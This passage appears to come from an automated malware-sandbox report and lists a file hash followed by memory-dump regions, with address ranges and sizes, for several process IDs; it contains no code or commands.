        d3bceed7c504b69b5f11e4010d2a757f6acf42e7e175b7ed95d6a4134b0724478adf3a23bd346e8df82d1ae213b47b1830ee788f5276d624ce383d8200ef2df3

      • memory/1008-57-0x000001F51C1D0000-0x000001F51C1E8000-memory.dmp

        Filesize

        96KB

      • memory/2312-16-0x000001F1DC8B0000-0x000001F1DC960000-memory.dmp

        Filesize

        704KB

      • memory/2312-15-0x000001F1DC380000-0x000001F1DC388000-memory.dmp

        Filesize

        32KB

      • memory/2312-0-0x00007FFED3AC3000-0x00007FFED3AC5000-memory.dmp

        Filesize

        8KB

      • memory/2312-14-0x000001F1DC830000-0x000001F1DC8A6000-memory.dmp

        Filesize

        472KB

      • memory/2312-50-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/2312-13-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/2312-12-0x000001F1DC3A0000-0x000001F1DC3E4000-memory.dmp

        Filesize

        272KB

      • memory/2312-11-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/2312-1-0x000001F1C1FF0000-0x000001F1C2012000-memory.dmp

        Filesize

        136KB

      • memory/3916-93-0x0000000004C00000-0x0000000004C66000-memory.dmp

        Filesize

        408KB

      • memory/3916-176-0x0000000006380000-0x000000000638A000-memory.dmp

        Filesize

        40KB

      • memory/3916-91-0x00000000051B0000-0x0000000005754000-memory.dmp

        Filesize

        5.6MB

      • memory/3916-92-0x0000000004B50000-0x0000000004BE2000-memory.dmp

        Filesize

        584KB

      • memory/3916-90-0x00000000000E0000-0x000000000014C000-memory.dmp

        Filesize

        432KB

      • memory/3916-94-0x0000000005860000-0x0000000005872000-memory.dmp

        Filesize

        72KB

      • memory/3916-95-0x0000000005DA0000-0x0000000005DDC000-memory.dmp

        Filesize

        240KB

      • memory/4072-24-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/4072-32-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/4072-29-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/4072-28-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

      • memory/4400-89-0x00000000000D0000-0x00000000000E6000-memory.dmp

        Filesize

        88KB

      • memory/4772-186-0x000000001C6A0000-0x000000001C6AE000-memory.dmp

        Filesize

        56KB

      • memory/4772-86-0x0000000000270000-0x000000000028A000-memory.dmp

        Filesize

        104KB